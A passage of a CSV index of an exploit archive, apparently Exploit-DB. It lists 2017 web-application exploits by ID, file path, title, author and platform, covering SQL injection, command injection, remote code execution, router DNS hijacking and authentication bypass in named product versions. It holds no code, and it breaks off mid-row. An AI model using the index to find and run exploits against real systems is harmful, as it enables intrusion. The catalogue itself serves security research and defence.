+42173,exploits/php/webapps/42173.txt,"WordPress Plugin Event List < 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",webapps,php, +42178,exploits/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,webapps,hardware, +42184,exploits/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",webapps,aspx, +42185,exploits/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,webapps,php, +42187,exploits/linux/webapps/42187.py,"IBM Informix Dynamic Server - Code Injection / Remote Code Execution",2017-06-16,IMgod,webapps,linux, +42192,exploits/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",webapps,hardware, +42193,exploits/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",webapps,php, +42194,exploits/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",webapps,hardware, +42195,exploits/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",webapps,hardware, +42196,exploits/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",webapps,hardware, +42197,exploits/hardware/webapps/42197.sh,"D-Link DSL-2640B ADSL Router - 'dnscfg' Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",webapps,hardware, +42205,exploits/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",webapps,php, +42221,exploits/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,webapps,php, +42252,exploits/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",webapps,hardware, +42262,exploits/php/webapps/42262.txt,"GLPI 0.90.4 - SQL Injection",2017-06-27,"Eric CARTER",webapps,php, +42263,exploits/php/webapps/42263.txt,"WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection",2017-06-27,"Lenon Leite",webapps,php, +42268,exploits/windows/webapps/42268.py,"Easy File Sharing Web Server 7.2 - Unrestricted File Upload",2017-06-28,Chako,webapps,windows, +42269,exploits/linux/webapps/42269.txt,"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities",2017-06-28,"Core Security",webapps,linux, +42284,exploits/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,webapps,hardware, +42293,exploits/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",webapps,hardware, +42290,exploits/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",webapps,linux, +42291,exploits/php/webapps/42291.txt,"WordPress Plugin WatuPRO 5.5.1 - SQL Injection",2017-07-03,"Manich Koomsusi",webapps,php, +42520,exploits/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,webapps,php, +42306,exploits/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",webapps,linux, +42307,exploits/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,webapps,hardware, +42308,exploits/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,webapps,hardware, +42309,exploits/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,webapps,hardware, +42311,exploits/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,webapps,windows, +42312,exploits/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,webapps,windows, +42313,exploits/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",webapps,hardware, +42314,exploits/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",webapps,linux, +42317,exploits/php/webapps/42317.txt,"WordPress Plugin Sabai Discuss - Cross-Site Scripting",2017-07-12,"Hesam Bazvand",webapps,php, +42320,exploits/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,webapps,hardware, +42321,exploits/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,webapps,hardware, +42322,exploits/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,webapps,hardware, +42323,exploits/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,webapps,hardware, +42324,exploits/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",webapps,multiple, +42326,exploits/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,webapps,hardware, +42330,exploits/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,webapps,php, +42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json, +42333,exploits/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,hardware, +42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple, +42340,exploits/jsp/webapps/42340.txt,"Oracle E-Business Suite 12.x - Server-Side Request Forgery",2017-07-19,"Sarath Nair",webapps,jsp, +42342,exploits/cgi/webapps/42342.txt,"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection",2017-07-19,xort,webapps,cgi, +42343,exploits/cgi/webapps/42343.rb,"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)",2017-07-19,xort,webapps,cgi, +42345,exploits/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,webapps,cgi, +42344,exploits/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,webapps,cgi, +42346,exploits/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,webapps,cgi, +42347,exploits/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection",2017-07-20,Teng,webapps,php, +42348,exploits/php/webapps/42348.txt,"Tilde CMS 1.01 - Multiple Vulnerabilities",2017-07-20,"Raffaele Forte",webapps,php, +42351,exploits/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,webapps,php, +42352,exploits/hardware/webapps/42352.txt,"VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass",2017-07-20,Viktoras,webapps,hardware, +42353,exploits/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,webapps,php, +42358,exploits/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",webapps,java, +42359,exploits/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",webapps,php, +42371,exploits/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",webapps,json, +42372,exploits/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",webapps,json, +42378,exploits/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",webapps,multiple, +42379,exploits/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,webapps,php, +42380,exploits/php/webapps/42380.txt,"WordPress Plugin Ads Pro < 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,webapps,php, +42383,exploits/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,webapps,php, +42381,exploits/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",webapps,php, +42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,webapps,java, +42387,exploits/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection",2017-07-27,"Shahab Shamsi",webapps,php, +42388,exploits/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware, +42401,exploits/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",webapps,jsp, +42402,exploits/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",webapps,jsp, +42403,exploits/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",webapps,php, +42404,exploits/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",webapps,php, +42408,exploits/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",webapps,hardware, +42410,exploits/php/webapps/42410.txt,"JoySale 2.2.1 - Arbitrary File Upload",2017-08-01,"Mutlu Benmutlu",webapps,php, +42412,exploits/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' SQL Injection",2017-08-02,"Meisam Monsef",webapps,php, +42413,exploits/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",webapps,php, +42414,exploits/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",webapps,php, +42415,exploits/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",webapps,php, +42416,exploits/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",webapps,php, +42417,exploits/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",webapps,php, +42419,exploits/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",webapps,php, +42420,exploits/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",webapps,php, +42421,exploits/php/webapps/42421.txt,"Muviko 1.0 - 'q' SQL Injection",2017-08-02,"Kaan KAMIS",webapps,php, +42635,exploits/php/webapps/42635.txt,"Escort Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42423,exploits/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",webapps,php, +42427,exploits/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",webapps,hardware, +42431,exploits/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,webapps,php,80 +42434,exploits/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",webapps,hardware, +42436,exploits/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,webapps,jsp, +42437,exploits/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-08-09,LiquidWorm,webapps,jsp, +42438,exploits/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,webapps,jsp, +42439,exploits/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,webapps,jsp, +42440,exploits/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",webapps,php, +42441,exploits/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php, +42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php, +42443,exploits/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",webapps,php, +42444,exploits/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",webapps,windows, +42446,exploits/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",webapps,php, +42447,exploits/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",webapps,php, +42448,exploits/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",webapps,php, +42449,exploits/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",webapps,hardware, +42450,exploits/hardware/webapps/42450.php,"AirMaster 3000M - Multiple Vulnerabilities",2017-08-12,"Mr.8Th BiT",webapps,hardware, +42452,exploits/php/webapps/42452.py,"RPi Cam Control < 6.3.14 - Remote Command Execution",2017-08-14,"Alexander Korznikov",webapps,php, +42458,exploits/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",webapps,php, +42457,exploits/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,webapps,php, +42461,exploits/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",webapps,php, +42462,exploits/php/webapps/42462.txt,"Photogallery Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",webapps,php, +42463,exploits/php/webapps/42463.txt,"Doctor Patient Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",webapps,php, +42482,exploits/php/webapps/42482.txt,"Food Ordering Script 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",webapps,php, +42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42488,exploits/php/webapps/42488.txt,"LiveSupport 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42490,exploits/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, +42492,exploits/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42493,exploits/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42494,exploits/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42496,exploits/php/webapps/42496.txt,"Matrimony Script 2.7 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42497,exploits/php/webapps/42497.txt,"eCardMAX 10.5 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42499,exploits/php/webapps/42499.txt,"SOA School Management 3.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42500,exploits/php/webapps/42500.txt,"Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42501,exploits/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42502,exploits/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42504,exploits/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",webapps,php, +42505,exploits/php/webapps/42505.txt,"iTech B2B Script 4.42 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42517,exploits/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,webapps,xml, +42506,exploits/php/webapps/42506.txt,"iTech Business Networking Script 8.26 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42507,exploits/php/webapps/42507.txt,"iTech Caregiver Script 2.71 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42508,exploits/php/webapps/42508.txt,"iTech Classifieds Script 7.41 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42509,exploits/php/webapps/42509.txt,"iTech Image Sharing Script 4.13 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42510,exploits/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42511,exploits/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42513,exploits/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42514,exploits/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42515,exploits/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42516,exploits/php/webapps/42516.txt,"iTech Movie Script 7.51 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, +42524,exploits/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42525,exploits/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42526,exploits/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42527,exploits/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42528,exploits/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42529,exploits/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42530,exploits/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42531,exploits/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",webapps,php, +42532,exploits/php/webapps/42532.txt,"Joomla! Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42533,exploits/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42534,exploits/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php, +42535,exploits/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,webapps,php, +42561,exploits/php/webapps/42561.txt,"Joomla! Component OSDownloads 1.7.4 - SQL Injection",2017-08-25,"Ihsan Sencan",webapps,php, +42562,exploits/php/webapps/42562.txt,"AutoCar 1.1 - 'category' SQL Injection",2017-08-25,"Bora Bozdogan",webapps,php, +42564,exploits/php/webapps/42564.txt,"Joomla! Component Responsive Portfolio 1.6.1 - SQL Injection",2017-08-25,"Ihsan Sencan",webapps,php, +42566,exploits/php/webapps/42566.txt,"Matrimonial Script 2.7 - Authentication Bypass",2017-08-27,"Ali BawazeEer",webapps,php, +42569,exploits/php/webapps/42569.txt,"Smart Chat 1.0.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, +42570,exploits/php/webapps/42570.txt,"FTP Made Easy PRO 1.2 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, +42571,exploits/php/webapps/42571.txt,"WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download",2017-08-28,"Ihsan Sencan",webapps,php, +42572,exploits/php/webapps/42572.txt,"Easy Web Search 4.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, +42573,exploits/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, +42574,exploits/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, +42575,exploits/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",webapps,php, +42577,exploits/php/webapps/42577.txt,"CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities",2017-06-01,Kaimi,webapps,php, +42578,exploits/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",webapps,php, +42579,exploits/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,webapps,json, +42580,exploits/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,webapps,json, +42581,exploits/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",webapps,hardware, +42582,exploits/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",webapps,php, +42583,exploits/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",webapps,php, +42584,exploits/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",webapps,php, +42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php, +42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware, +42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php, +42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php, +42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php, +42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php, +42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php, +42596,exploits/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",webapps,php, +42597,exploits/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",webapps,php, +42598,exploits/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",webapps,php, +42603,exploits/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,webapps,php, +42606,exploits/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' SQL Injection",2017-09-03,"Ihsan Sencan",webapps,php, +42607,exploits/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",webapps,php, +42608,exploits/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",webapps,hardware, +42610,exploits/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,webapps,multiple, +42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",webapps,multiple, +42615,exploits/php/webapps/42615.txt,"A2billing 2.x - SQL Injection",2017-09-05,0x4148,webapps,php, +42616,exploits/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,webapps,php, +42617,exploits/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",webapps,php, +42618,exploits/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",webapps,php, +42619,exploits/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",webapps,php, +42620,exploits/php/webapps/42620.txt,"Cory Support - 'pr' SQL Injection",2017-09-06,v3n0m,webapps,php, +42622,exploits/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",webapps,php, +42623,exploits/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",webapps,php, +42628,exploits/php/webapps/42628.txt,"Ultimate HR System < 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,webapps,php, +42629,exploits/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php, +42631,exploits/php/webapps/42631.txt,"EzBan 5.3 - 'id' SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php, +42632,exploits/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php, +42633,exploits/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",webapps,hardware, +42634,exploits/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",webapps,hardware, +42636,exploits/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42637,exploits/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42638,exploits/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",webapps,php, +42639,exploits/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42641,exploits/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42642,exploits/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42643,exploits/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42644,exploits/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42645,exploits/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42648,exploits/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",webapps,php, +42649,exploits/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access 